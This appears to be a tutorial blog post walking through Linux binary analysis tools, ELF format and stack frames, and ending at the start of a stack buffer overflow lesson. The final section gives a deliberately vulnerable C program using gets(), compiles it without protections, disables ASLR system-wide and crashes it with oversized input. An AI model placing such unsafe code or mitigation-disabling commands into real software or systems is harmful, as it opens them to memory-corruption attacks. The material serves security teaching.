1. Understanding Stack-Based Buffer Overflows
- published
- reading time
- 30 minutes
Decoding the Binary: A Prelude to Linux Stack Smashing and Exploit Development
Before diving into the world of Linux stack smashing, it’s crucial to begin with binary analysis. Analyzing the binary executable provides us with valuable insights into its structure, functions, and potential vulnerabilities. Through binary analysis, we can identify the layout of the stack, the presence of buffer overflows, and other crucial details that will aid us in crafting our exploit. This initial step sets the foundation for our exploit development process, allowing us to understand the inner workings of the program and how we can manipulate its behavior. Let’s embark on this journey of analysis to unravel the secrets hidden within the binary.
Following tools can be used to analyze the binary:
1. file
One of the fundamental tools in binary analysis is the file
command. This versatile tool provides essential information about a binary file’s type, architecture, and more. The file
command starts by looking at the “magic numbers” or file signatures present in the file. file
uses a database called magic.mgc
or magic
to map file signatures to file types.
Here’s an example of using the file command and its output:
$ file /bin/ls
/bin/ls: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=5a23a3d88888f69f1ae22e25a8f32d5a36f1662f, for GNU/Linux 3.2.0, stripped
The output tells us that it’s an ELF (Executable and Linkable Format) 64-bit binary for an x86-64 architecture, dynamically linked, and stripped of debugging symbols.
2. ldd
The ldd
command is a valuable tool for examining the shared library dependencies of an executable or a shared library in a Linux system. When run with the path to an executable, ldd
displays a list of the shared libraries that the executable is linked against. This information is crucial for understanding the runtime environment required by the executable and ensuring that all necessary libraries are present on the system.
It’s important to note that ldd
works with dynamically linked binaries. If a binary is statically linked (meaning it includes all necessary libraries within itself), ldd
will not provide any output related to shared library dependencies.
Refer file_dyn and file_stat in my github repo.
$ gcc file.c -o file_dyn
$ ldd file_dyn
linux-vdso.so.1 (0x00007ffdcd9e8000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f977b625000)
/lib64/ld-linux-x86-64.so.2 (0x00007f977b837000)
Each line in the output corresponds to a shared library, along with its full path on the system and the memory address at which it is loaded. This information helps in troubleshooting missing library dependencies and resolving issues related to shared libraries.
For example, running ldd
on a statically linked binary like the following binary will not display any shared library dependencies:
$ gcc -static file.c -o file_stat
$ ldd file_stat
not a dynamic executable
Also, you can verify that the size of statically linked library is more than that of dynamically linked.
$ du -h file_stat file_dyn
720K file_stat
16K file_dyn
3. ltrace
After confirming that the given library is dependent on external libraries, it’s time to trace the functions that are called from those libraries. ltrace
is a dynamic tracing utility in Linux that enables us to intercept and display library calls made by an executed program. By running ltrace
followed by the path to an executable, we can observe the library functions being called, along with the arguments passed to them. This tool is invaluable for understanding how a program interacts with shared libraries at runtime, providing insights into its behavior and aiding in debugging and analysis.
To illustrate the utility of ltrace
in binary analysis, let’s consider a scenario where we have a shared library libadd.so that exports an add function, which takes two integers as parameters and returns their sum.
First, we’ll create the libadd.so library with a simple add function:
$ gcc -shared -fPIC add.c -o libadd.so
Now, let’s create a program that uses this add function from libadd.so.
$ gcc -o useAdd useAdd.c -L. -ladd
Now, here comes the exciting part. We can use ltrace to trace the library calls made by main to libadd.so:
$ LD_LIBRARY_PATH=. ltrace ./useAdd
add(5, 3, 3, 0x55a0de3cbdc8) = 8
printf("The sum of %d and %d is %d\n", 5, 3, 8The sum of 5 and 3 is 8
) = 24
+++ exited (status 0) +++
The output will show the add function being called with the arguments 5 and 3, and the resulting sum 8.
4. hexdump
When it comes to binary analysis, one of the essential tools in a Linux developer’s arsenal is hexdump
. This command-line utility allows us to examine and manipulate binary files at a byte level, providing a hexadecimal and ASCII representation of the file’s contents.
$ hexdump [options] [file]
Here are a few common options:
-C: Display the output in a canonical hex+ASCII display.
-n: Limit the number of bytes to dump.
-s: Skip a number of bytes from the beginning.
We will inspect first 64 bytes of file_dyn:
$ hexdump -C -n 64 file_dyn
00000000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|
00000010 03 00 3e 00 01 00 00 00 50 10 00 00 00 00 00 00 |..>.....P.......|
00000020 40 00 00 00 00 00 00 00 90 36 00 00 00 00 00 00 |@........6......|
00000030 00 00 00 00 40 00 38 00 0d 00 40 00 1f 00 1e 00 |....@.8...@.....|
00000040
While hexdump
is a powerful utility, there is an alternative tool called xxd, which also allows for viewing binary files in a hex format.
$ xxd -l 64 file_dyn
00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000 .ELF............
00000010: 0300 3e00 0100 0000 5010 0000 0000 0000 ..>.....P.......
00000020: 4000 0000 0000 0000 9036 0000 0000 0000 @........6......
00000030: 0000 0000 4000 3800 0d00 4000 1f00 1e00 ....@.8...@.....
5. strings
Now that we’ve examined the binary at byte level, let’s move on to another useful tool in binary analysis: the strings
command. The strings
command in Linux is a simple yet powerful utility that extracts readable strings from binary files.
The -n
option specifies the minimum string length to be included in the output.
$ strings -n 6 file_dyn
/lib64/ld-linux-x86-64.so.2
...
libc.so.6
...
Hello World
GCC: (Debian 14.2.0-6) 14.2.0
...
file.c
...
This command extracts printable strings from the file_dyn binary, but it only includes strings that are at least 6 characters long. Strings extraction is a crucial initial step in binary reverse engineering and forensic analysis. It uncovers valuable clues about a binary’s purpose, origin, and potential errors or debug information embedded within.
6. readelf
Another essential tool in the binary analysis toolkit is readelf
. This command-line utility is used to display information about ELF (Executable and Linkable Format) files, providing detailed insights into the structure of binary executables and shared libraries.
Commonly used command line arguments
- File Header (-h/--file-header)
This options displays the ELF file header of a binary file.
$ readelf -h file_dyn
ELF Header:
Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
Class: ELF64
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: DYN (Position-Independent Executable file)
Machine: Advanced Micro Devices X86-64
Version: 0x1
Entry point address: 0x1050
Start of program headers: 64 (bytes into file)
Start of section headers: 13968 (bytes into file)
Flags: 0x0
Size of this header: 64 (bytes)
Size of program headers: 56 (bytes)
Number of program headers: 13
Size of section headers: 64 (bytes)
Number of section headers: 31
Section header string table index: 30
- Program Headers (-l/--program-headers)
Program headers describe segments’ layout in the binary. This information is vital for understanding memory mapping and the executable’s load address.
- Section Headers (-S/--section-headers)
This option displays detailed information about each section in the ELF file. Section headers include names, types, addresses, sizes, and other attributes.
$ readelf -S file_dyn
There are 31 section headers, starting at offset 0x3690:
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
0000000000000000 0000000000000000 0 0 0
[ 1] .interp PROGBITS 0000000000000318 00000318
000000000000001c 0000000000000000 A 0 0 1
[ 2] .note.gnu.pr[...] NOTE 0000000000000338 00000338
0000000000000020 0000000000000000 A 0 0 8
[ 3] .note.gnu.bu[...] NOTE 0000000000000358 00000358
0000000000000024 0000000000000000 A 0 0 4
[ 4] .note.ABI-tag NOTE 000000000000037c 0000037c
0000000000000020 0000000000000000 A 0 0 4
[ 5] .gnu.hash GNU_HASH 00000000000003a0 000003a0
0000000000000024 0000000000000000 A 6 0 8
[ 6] .dynsym DYNSYM 00000000000003c8 000003c8
00000000000000a8 0000000000000018 A 7 1 8
[ 7] .dynstr STRTAB 0000000000000470 00000470
000000000000008d 0000000000000000 A 0 0 1
[ 8] .gnu.version VERSYM 00000000000004fe 000004fe
000000000000000e 0000000000000002 A 6 0 2
[ 9] .gnu.version_r VERNEED 0000000000000510 00000510
0000000000000030 0000000000000000 A 7 1 8
[10] .rela.dyn RELA 0000000000000540 00000540
00000000000000c0 0000000000000018 A 6 0 8
[11] .rela.plt RELA 0000000000000600 00000600
0000000000000018 0000000000000018 AI 6 24 8
[12] .init PROGBITS 0000000000001000 00001000
0000000000000017 0000000000000000 AX 0 0 4
[13] .plt PROGBITS 0000000000001020 00001020
0000000000000020 0000000000000010 AX 0 0 16
[14] .plt.got PROGBITS 0000000000001040 00001040
0000000000000008 0000000000000008 AX 0 0 8
[15] .text PROGBITS 0000000000001050 00001050
0000000000000103 0000000000000000 AX 0 0 16
[16] .fini PROGBITS 0000000000001154 00001154
0000000000000009 0000000000000000 AX 0 0 4
[17] .rodata PROGBITS 0000000000002000 00002000
0000000000000010 0000000000000000 A 0 0 4
[18] .eh_frame_hdr PROGBITS 0000000000002010 00002010
000000000000002c 0000000000000000 A 0 0 4
[19] .eh_frame PROGBITS 0000000000002040 00002040
00000000000000ac 0000000000000000 A 0 0 8
[20] .init_array INIT_ARRAY 0000000000003dd0 00002dd0
0000000000000008 0000000000000008 WA 0 0 8
[21] .fini_array FINI_ARRAY 0000000000003dd8 00002dd8
0000000000000008 0000000000000008 WA 0 0 8
[22] .dynamic DYNAMIC 0000000000003de0 00002de0
00000000000001e0 0000000000000010 WA 7 0 8
[23] .got PROGBITS 0000000000003fc0 00002fc0
0000000000000028 0000000000000008 WA 0 0 8
[24] .got.plt PROGBITS 0000000000003fe8 00002fe8
0000000000000020 0000000000000008 WA 0 0 8
[25] .data PROGBITS 0000000000004008 00003008
0000000000000010 0000000000000000 WA 0 0 8
[26] .bss NOBITS 0000000000004018 00003018
0000000000000008 0000000000000000 WA 0 0 1
[27] .comment PROGBITS 0000000000000000 00003018
000000000000001f 0000000000000001 MS 0 0 1
[28] .symtab SYMTAB 0000000000000000 00003038
0000000000000360 0000000000000018 29 18 8
[29] .strtab STRTAB 0000000000000000 00003398
00000000000001da 0000000000000000 0 0 1
[30] .shstrtab STRTAB 0000000000000000 00003572
000000000000011a 0000000000000000 0 0 1
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
L (link order), O (extra OS processing required), G (group), T (TLS),
C (compressed), x (unknown), o (OS specific), E (exclude),
D (mbind), l (large), p (processor specific)
- Symbol Table (-s/--syms/--symbols)
The symbol table contains information about symbols used in the binary, including functions and variables. This is invaluable for understanding program logic.
$ readelf -s file_dyn
Symbol table '.dynsym' contains 7 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND
1: 0000000000000000 0 FUNC GLOBAL DEFAULT UND _[...]@GLIBC_2.34 (2)
2: 0000000000000000 0 NOTYPE WEAK DEFAULT UND _ITM_deregisterT[...]
3: 0000000000000000 0 FUNC GLOBAL DEFAULT UND puts@GLIBC_2.2.5 (3)
4: 0000000000000000 0 NOTYPE WEAK DEFAULT UND __gmon_start__
5: 0000000000000000 0 NOTYPE WEAK DEFAULT UND _ITM_registerTMC[...]
6: 0000000000000000 0 FUNC WEAK DEFAULT UND [...]@GLIBC_2.2.5 (3)
Symbol table '.symtab' contains 36 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND
1: 0000000000000000 0 FILE LOCAL DEFAULT ABS Scrt1.o
2: 000000000000037c 32 OBJECT LOCAL DEFAULT 4 __abi_tag
3: 0000000000000000 0 FILE LOCAL DEFAULT ABS crtstuff.c
4: 0000000000001080 0 FUNC LOCAL DEFAULT 15 deregister_tm_clones
5: 00000000000010b0 0 FUNC LOCAL DEFAULT 15 register_tm_clones
6: 00000000000010f0 0 FUNC LOCAL DEFAULT 15 __do_global_dtors_aux
7: 0000000000004018 1 OBJECT LOCAL DEFAULT 26 completed.0
8: 0000000000003dd8 0 OBJECT LOCAL DEFAULT 21 __do_global_dtor[...]
9: 0000000000001130 0 FUNC LOCAL DEFAULT 15 frame_dummy
10: 0000000000003dd0 0 OBJECT LOCAL DEFAULT 20 __frame_dummy_in[...]
11: 0000000000000000 0 FILE LOCAL DEFAULT ABS file.c
12: 0000000000000000 0 FILE LOCAL DEFAULT ABS crtstuff.c
13: 00000000000020e8 0 OBJECT LOCAL DEFAULT 19 __FRAME_END__
14: 0000000000000000 0 FILE LOCAL DEFAULT ABS
15: 0000000000003de0 0 OBJECT LOCAL DEFAULT 22 _DYNAMIC
16: 0000000000002010 0 NOTYPE LOCAL DEFAULT 18 __GNU_EH_FRAME_HDR
17: 0000000000003fe8 0 OBJECT LOCAL DEFAULT 24 _GLOBAL_OFFSET_TABLE_
18: 0000000000000000 0 FUNC GLOBAL DEFAULT UND __libc_start_mai[...]
19: 0000000000000000 0 NOTYPE WEAK DEFAULT UND _ITM_deregisterT[...]
20: 0000000000004008 0 NOTYPE WEAK DEFAULT 25 data_start
21: 0000000000000000 0 FUNC GLOBAL DEFAULT UND puts@GLIBC_2.2.5
22: 0000000000004018 0 NOTYPE GLOBAL DEFAULT 25 _edata
23: 0000000000001154 0 FUNC GLOBAL HIDDEN 16 _fini
24: 0000000000004008 0 NOTYPE GLOBAL DEFAULT 25 __data_start
25: 0000000000000000 0 NOTYPE WEAK DEFAULT UND __gmon_start__
26: 0000000000004010 0 OBJECT GLOBAL HIDDEN 25 __dso_handle
27: 0000000000002000 4 OBJECT GLOBAL DEFAULT 17 _IO_stdin_used
28: 0000000000004020 0 NOTYPE GLOBAL DEFAULT 26 _end
29: 0000000000001050 34 FUNC GLOBAL DEFAULT 15 _start
30: 0000000000004018 0 NOTYPE GLOBAL DEFAULT 26 __bss_start
31: 0000000000001139 26 FUNC GLOBAL DEFAULT 15 main
32: 0000000000004018 0 OBJECT GLOBAL HIDDEN 25 __TMC_END__
33: 0000000000000000 0 NOTYPE WEAK DEFAULT UND _ITM_registerTMC[...]
34: 0000000000000000 0 FUNC WEAK DEFAULT UND __cxa_finalize@G[...]
35: 0000000000001000 0 FUNC GLOBAL HIDDEN 12 _init
- Dynamic Section (-d/--dynamic)
This option reveals the dynamic linking information, including shared library dependencies and versioning details. No dynamic linking information will be displayed for statically linked binaries, as they do not rely on shared libraries at runtime.
$ readelf -d file_dyn
Dynamic section at offset 0x2de0 contains 26 entries:
Tag Type Name/Value
0x0000000000000001 (NEEDED) Shared library: [libc.so.6]
0x000000000000000c (INIT) 0x1000
0x000000000000000d (FINI) 0x1154
0x0000000000000019 (INIT_ARRAY) 0x3dd0
0x000000000000001b (INIT_ARRAYSZ) 8 (bytes)
0x000000000000001a (FINI_ARRAY) 0x3dd8
0x000000000000001c (FINI_ARRAYSZ) 8 (bytes)
0x000000006ffffef5 (GNU_HASH) 0x3a0
0x0000000000000005 (STRTAB) 0x470
0x0000000000000006 (SYMTAB) 0x3c8
0x000000000000000a (STRSZ) 141 (bytes)
0x000000000000000b (SYMENT) 24 (bytes)
0x0000000000000015 (DEBUG) 0x0
0x0000000000000003 (PLTGOT) 0x3fe8
0x0000000000000002 (PLTRELSZ) 24 (bytes)
0x0000000000000014 (PLTREL) RELA
0x0000000000000017 (JMPREL) 0x600
0x0000000000000007 (RELA) 0x540
0x0000000000000008 (RELASZ) 192 (bytes)
0x0000000000000009 (RELAENT) 24 (bytes)
0x000000006ffffffb (FLAGS_1) Flags: PIE
0x000000006ffffffe (VERNEED) 0x510
0x000000006fffffff (VERNEEDNUM) 1
0x000000006ffffff0 (VERSYM) 0x4fe
0x000000006ffffff9 (RELACOUNT) 3
0x0000000000000000 (NULL) 0x0
$ readelf -d file_stat
There is no dynamic section in this file.
- Section Headers and Their Contents (-x/--hex-dump=)
This option displays the hexadecimal and ASCII representation of the content of a specific section. For instance, to examine the .text section
$ readelf -x .text file_dyn
Hex dump of section '.text':
0x00001050 31ed4989 d15e4889 e24883e4 f0505445 1.I..^H..H...PTE
0x00001060 31c031c9 488d3dce 000000ff 154f2f00 1.1.H.=......O/.
0x00001070 00f4662e 0f1f8400 00000000 0f1f4000 ..f...........@.
0x00001080 488d3d91 2f000048 8d058a2f 00004839 H.=./..H.../..H9
0x00001090 f8741548 8b052e2f 00004885 c07409ff .t.H.../..H..t..
0x000010a0 e00f1f80 00000000 c30f1f80 00000000 ................
0x000010b0 488d3d61 2f000048 8d355a2f 00004829 H.=a/..H.5Z/..H)
0x000010c0 fe4889f0 48c1ee3f 48c1f803 4801c648 .H..H..?H...H..H
0x000010d0 d1fe7414 488b05fd 2e000048 85c07408 ..t.H......H..t.
0x000010e0 ffe0660f 1f440000 c30f1f80 00000000 ..f..D..........
0x000010f0 f30f1efa 803d1d2f 00000075 2b554883 .....=./...u+UH.
0x00001100 3dda2e00 00004889 e5740c48 8b3dfe2e =.....H..t.H.=..
0x00001110 0000e829 ffffffe8 64ffffff c605f52e ...)....d.......
0x00001120 0000015d c30f1f00 c30f1f80 00000000 ...]............
0x00001130 f30f1efa e977ffff ff554889 e5488d05 .....w...UH..H..
0x00001140 c00e0000 4889c7e8 e4feffff b8000000 ....H...........
0x00001150 005dc3 .].
- Display Dynamic String Table (--dyn-syms)
This option prints dynamic symbols, which are essential for dynamic linking analysis.
$ readelf --dyn-syms file_dyn
Symbol table '.dynsym' contains 7 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND
1: 0000000000000000 0 FUNC GLOBAL DEFAULT UND _[...]@GLIBC_2.34 (2)
2: 0000000000000000 0 NOTYPE WEAK DEFAULT UND _ITM_deregisterT[...]
3: 0000000000000000 0 FUNC GLOBAL DEFAULT UND puts@GLIBC_2.2.5 (3)
4: 0000000000000000 0 NOTYPE WEAK DEFAULT UND __gmon_start__
5: 0000000000000000 0 NOTYPE WEAK DEFAULT UND _ITM_registerTMC[...]
6: 0000000000000000 0 FUNC WEAK DEFAULT UND [...]@GLIBC_2.2.5 (3)
7. objdump
Objdump
, a part of the GNU Binutils suite, is a versatile command-line tool that serves as a Swiss Army knife for binary analysis. It offers a wide range of options to examine object files, executables, shared libraries, and core dump files. Binaries are generated when source code is compiled, producing machine language instructions specific to the CPU architecture. Objdump
reads these binaries and displays their architecture-specific assembly language instructions, providing insights into program operations at the CPU level.
Example Usages:
- Disassemble an Executable
$ objdump -d file_dyn
- Display File Header Information (-f/--file-headers)
$ objdump -f file_dyn
- Display Section Headers (-h/--section-headers)
$ objdump -h file_dyn
8. strace
A system call is a mechanism that allows user-space programs to request services from the kernel, effectively bridging the gap between the user and the system. When a program makes a system call, it transitions from user mode to kernel mode, which provides the necessary privileges to perform operations that are otherwise restricted in user mode.
strace
is a powerful diagnostic tool used in Linux and Unix-like operating systems to monitor system calls and signals. This command-line utility is invaluable for troubleshooting and understanding how programs interact with the operating system kernel. By tracing the system calls made by a program, developers and system administrators can gain insights into its behavior, identify issues such as file access problems or incorrect permissions, and optimize performance.
If you have used ltrace
, mentioned earlier, think of strace
being similar. The only difference is that, instead of calling a library, the strace
utility traces system calls. System calls are how you interface with the kernel to get work done.
Image Source: scaler
By default, strace does not trace child processes. To trace them as well, use the -f option:
$ strace -f file_dyn
To view the system calls along with their arguments:
$ strace -f -v file_dyn
9. nm
The nm
command in Linux stands for Name Mangler. It is used to list symbols from object files, such as .o
files, static libraries (.a
files), and shared libraries (.so
files). The nm
command provides information about the symbols in these files, including their names, addresses, and types, which is useful for debugging and analyzing compiled code.
- List Symbols in an Object File
$ # Compile a C source file into an object file using the following command:
$ gcc -c file.c
$ nm file.o
0000000000000000 T main
U puts
The first column shows the address of the symbol in hexadecimal. For the main function, this is 0000000000000000
, indicating that it is defined but not yet assigned a memory address since it is still in the object file state.
Symbol Type:
- T: This indicates that main is a defined symbol (function) and is stored in the text (code) section of the object file. The capital T signifies that it is a global symbol, meaning it can be referenced from other object files or libraries.
- U: The puts function is marked as undefined. This means that the puts function is referenced in file.c but is not defined in the object file. Instead, it will be resolved during the linking stage, where the linker will find the implementation of puts in the standard C library.
Here’s a list of the common symbol types recognized by the nm command in Linux:
Character | Symbol Type | Description |
---|---|---|
T |
Text (code) | The symbol is defined in the text (code) section of the object file and is globally accessible (externally visible). |
t |
Text (code) | The symbol is defined in the text section but is local to the object file (not externally visible). |
D |
Data | The symbol is defined in the initialized data section and is globally accessible. |
d |
Data | The symbol is defined in the initialized data section but is local to the object file. |
B |
BSS (uninitialized data) | The symbol is defined in the uninitialized data section and is globally accessible. |
b |
BSS (uninitialized data) | The symbol is defined in the uninitialized data section but is local to the object file. |
R |
Read-only data | The symbol is defined in the read-only data section and is globally accessible. |
r |
Read-only data | The symbol is defined in the read-only data section but is local to the object file. |
U |
Undefined | The symbol is referenced but not defined in the object file. It must be resolved during linking. |
W |
Weak symbol | The symbol is a weak definition, which means it may be overridden by a strong definition in another object file. |
V |
Weak symbol (versioned) | A weak symbol with versioning information. |
N |
Debugging symbol | The symbol is a debugging symbol (like a file scope) and is not relevant for the actual executable code. |
S |
Symbol from a shared library | The symbol comes from a shared library but is not defined in the object file itself. |
? |
Unknown | The symbol type is unknown or cannot be determined. |
- Display Dynamic Symbols (usually found in shared libraries):
$ nm -D libadd.so
- List Symbols and Apply numeric sort on the addresses:
$ nm -n file_dyn
10. gdb
GDB (GNU Debugger) is a powerful command-line debugger for Unix-like systems. It allows developers to inspect and debug programs, providing a wide range of features for analyzing and manipulating the execution of code. From setting breakpoints to examining memory to stepping through code line-by-line, GDB is an essential tool for understanding and fixing software issues.
- Start GDB with Program
$ gdb file_dyn
- Set Breakpoints
(gdb) break <line_number>
(gdb) break 10
- To run the program:
(gdb) run
- Continue Execution
(gdb) continue
- Print Variable Value
(gdb) print <variable>
If you’re ready to delve deeper into the world of debugging and unlock its full potential, I invite you to check out my blog post titled “GDB: Zero to Hero.” In this advanced guide, you’ll discover a comprehensive tutorial on mastering the GNU Debugger (GDB) from scratch. Learn advanced debugging techniques, explore powerful features, and elevate your debugging skills to the next level.
Read “GDB: Zero to Hero”.
For a deeper understanding of binary analysis, I will be writing a blog post on this topic soon.
ELF 101
The Executable and Linkable Format (ELF) is a common standard file format for executable files, object code, shared libraries, and core dumps in Unix-like operating systems, including Linux. It provides a flexible and extensible structure for binary files, making it easier for the operating system to load and execute them.
Key Features of ELF
- Portability: ELF files can be used across different hardware architectures and operating systems, facilitating cross-platform development.
- Modularity: ELF supports dynamic linking and loading, allowing programs to use shared libraries and load modules at runtime.
- Extensibility: The ELF format is designed to be extensible, enabling the addition of new sections and types without breaking compatibility.
Structure of ELF
An ELF file is divided into several key components:
- ELF Header: Contains metadata about the file, such as the architecture, entry point address, and the program and section header table offsets.
- Program Header Table: Describes the segments of the file used during program execution, providing information needed for the operating system to load the program into memory.
- Section Header Table: Contains information about the sections of the file, such as text (code), data, and symbol tables, which are useful during linking and debugging.
- Sections: Individual components within the ELF file, each serving a specific purpose, including:
.text
: Contains the executable code..data
: Holds initialized global and static variables..bss
: Contains uninitialized global and static variables..rodata
: Contains read-only data, such as string literals..symtab
: Symbol table for linking and debugging.
To determine the type of an ELF file, you can use the readelf
and file
commands in Linux.
$ # $ readelf -h <binary>
$ readelf -h file_dyn
...
Type: DYN (Position-Independent Executable file)
...
$ readelf -h file.o
...
Type: REL (Relocatable file)
...
Types of ELF Files
Executable ELF (EXEC):
- Purpose: Contains a program that is ready to be executed by the operating system.
- Characteristics: Has a defined entry point and is directly runnable.
Dynamic ELF (DYN):
- Purpose: Used for shared libraries that can be linked at runtime.
- Characteristics: Supports dynamic linking, allowing multiple programs to share the same library in memory.
Relocatable ELF (REL):
- Purpose: Contains object code that can be linked to create an executable or a shared library.
- Characteristics: The addresses of symbols are not yet fixed and need to be resolved during the linking process.
Core ELF (CORE):
- Purpose: A core dump of a process’s memory at the time of a crash.
- Characteristics: Contains the process’s memory image, including the stack, heap, and CPU registers, useful for debugging.
How the Stack Operates
Before diving into Linux stack smashing, I’d like to take a moment to briefly explain the stack and its significance in program execution.
The stack is a special region of memory that stores temporary variables created by functions. It operates on a Last In, First Out (LIFO) basis, meaning the last item added to the stack is the first one to be removed. Each time a function is called, a new stack frame is created, which contains:
- Local Variables: Variables that are only accessible within the function.
- Return Address: The address to which control should return after the function completes.
- Function Parameters: Values passed to the function from its caller.
Below is a simple program that will help illustrate how the stack works in a C program:
#include <stdio.h>
void myFunc(int a, char *s) {
printf("1st arg: %d\n", a);
printf("2nd arg: %s\n", s);
}
int main() {
int num = 10;
char *str = "Hello\n";
myFunc(num, str);
return 0; // Added return statement for main
}
$ gcc -m32 stack.c -no-pie -fno-stack-protector -o stack
In this program, we define a function myFunc
that takes an integer and a string as arguments. While plain GDB provides basic debugging functionality, it lacks syntax highlighting and many advanced features that can enhance the debugging experience. We can improve GDB’s capabilities by using extensions such as pwndbg or GEF. Personally, I find both extensions useful, but for this series, we’ll focus on using pwndbg. Of course, you’re free to use GEF if you prefer!
$ gdb ./stack
pwndbg> disass main
Dump of assembler code for function main:
0x080491a8 <+0>: lea ecx,[esp+0x4]
...
0x080491dc <+52>: call 0x8049166 <myFunc>
0x080491e1 <+57>: add esp,0x10
...
pwndbg> disass myFunc
Dump of assembler code for function myFunc:
0x08049166 <+0>: push ebp
0x08049167 <+1>: mov ebp,esp
0x08049169 <+3>: push ebx
0x0804916a <+4>: sub esp,0x4
0x0804916d <+7>: call 0x80490a0 <__x86.get_pc_thunk.bx>
0x08049172 <+12>: add ebx,0x2e82
0x08049178 <+18>: sub esp,0x8
0x0804917b <+21>: push DWORD PTR [ebp+0x8]
0x0804917e <+24>: lea eax,[ebx-0x1fec]
0x08049184 <+30>: push eax
0x08049185 <+31>: call 0x8049040 <printf@plt>
0x0804918a <+36>: add esp,0x10
0x0804918d <+39>: sub esp,0x8
0x08049190 <+42>: push DWORD PTR [ebp+0xc]
0x08049193 <+45>: lea eax,[ebx-0x1fdf]
0x08049199 <+51>: push eax
0x0804919a <+52>: call 0x8049040 <printf@plt>
0x0804919f <+57>: add esp,0x10
0x080491a2 <+60>: nop
0x080491a3 <+61>: mov ebx,DWORD PTR [ebp-0x4]
0x080491a6 <+64>: leave
0x080491a7 <+65>: ret
End of assembler dump.
When myFunc(num, str)
is called, a new stack frame is created for myFunc
. This stack frame contains:
- The return address (where the program should continue after myFunc finishes).
- Local variables a and s, which hold the values passed from main (num and str).
Let’s set a breakpoint at the beginning of myFunc
to analyze the stack:
pwndbg> b *myFunc
Breakpoint 1 at 0x8049166
pwndbg> run
After running the program, we can check the stack state:
pwndbg> stack
00:0000│ esp 0xffffd59c —▸ 0x80491e1 (main+57) ◂— add esp, 0x10
01:0004│-028 0xffffd5a0 ◂— 0xa /* '\n' */
02:0008│-024 0xffffd5a4 —▸ 0x804a022 ◂— 'Hello\n'
As we can see, the return address 0x80491e1
has been pushed onto the stack.
Next, let’s set a breakpoint at the ret
instruction inside myFunc
:
pwndbg> b *myFunc + 65
Breakpoint 2 at 0x80491a7
pwndbg> c
After hitting the second breakpoint, we can observe that the top of the stack contains the address 0x80491e1
. The ret
instruction will pop this address off the stack and place it into the EIP register. Let’s use stepi
to step through the instruction:
pwndbg> stepi
pwndbg> reg $eip
$EIP 0x80491e1 (main+57) ◂— add esp, 0x10
As we can see, the EIP register now holds the return address. This demonstrates how the control flow is managed via the stack during function calls.
Linux Stack Smashing
Now that we’ve covered binary analysis, it’s time to delve into the concept of buffer overflow and its intricacies. 🎉💥
We will use the following vulnerable program vuln.c
:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void win(){
printf("You've reached the win function! 🎉\n");
exit(0);
}
void vuln(){
char buffer[64];
printf("Enter some text:\n");
gets(buffer); // Unsafe function - vulnerable to buffer overflow
}
int main() {
vuln();
printf("Try Again!\n");
return 0;
}
To create our vulnerable binary, we’ll compile it with all security checks disabled:
$ gcc -m32 -z execstack -no-pie vuln.c -o vuln
Before we run our newly compiled binary, let’s disable Address Space Layout Randomization (ASLR) to make it easier to exploit:
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Now, let’s take a moment to check the security features of our binary.
$ pwn checksec vuln
[*] '/home/kali/Desktop/Blogs/Materials/x86_exp_dev/01/vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x8048000)
Stack: Executable
RWX: Has RWX segments
Stripped: No
The checksec utility is included with the pwntools library, a powerful set of tools for binary exploitation. If you haven’t already installed pwntools, you can do so easily using pip. Here’s how:
$ pip install pwntools
Next, let’s break down what each of these security measures means.
Arch
- i386-32-little: Indicates that the binary is compiled for a 32-bit x86 architecture using little-endian byte order. This is important for understanding compatibility and potential exploits.RELRO
: Partial RELRO: RELRO (RELocation Read-Only) is a security feature that makes certain parts of the binary read-only after initialization. Partial RELRO means that only some sections are protected, which is less secure than Full RELRO.Stack: No canary found
- Stack canaries are used to detect buffer overflows by placing a special value (canary) before the return address. If the canary is modified, the program terminates, preventing exploitation. The absence of a canary makes the binary vulnerable to such attacks.NX - NX unknown - GNU_STACK missing
- NX (No-eXecute) prevents execution of code in certain memory regions. NX unknown means it’s unclear if NX is enforced, and GNU_STACK missing indicates that the binary lacks the necessary flags to specify its execution characteristics.PIE - No PIE (0x8048000)
- PIE (Position Independent Executable) allows a binary to be loaded at random memory addresses, enhancing security against certain attacks. The lack of PIE means the binary is loaded at a fixed address, making it easier to predict and exploit.Stack
- Executable - This indicates that the stack is marked as executable, which poses a major security risk. Attackers can execute arbitrary code placed on the stack, leading to potential exploits.- RWX: Has RWX segments - RWX (Read-Write-Execute) segments are sections of memory that can be read, written, and executed. This is a bad practice, as it allows for code injection attacks. The presence of RWX segments indicates serious security vulnerabilities.
Stripped: No
- This indicates that the binary contains its symbol information, making it easier to debug and analyze. While this is beneficial for development, it can also aid attackers in crafting exploits.
I understand that these security mitigations can be challenging to grasp, but bear with me—we’ll take it step by step. For now, just remember that we’ve disabled all security checks, allowing us to focus on the fundamentals of a vanilla buffer overflow.
Crashing the Program
When we run the program, we notice that it accepts input as expected:
$ ./vuln
Enter some text:
AAAAAAA
Try Again!
Everything seems normal, but what happens if we provide a larger input, like 100 A’s? Sounds interesting—let’s give it a shot! :)
$ ./vuln
Enter some text:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault
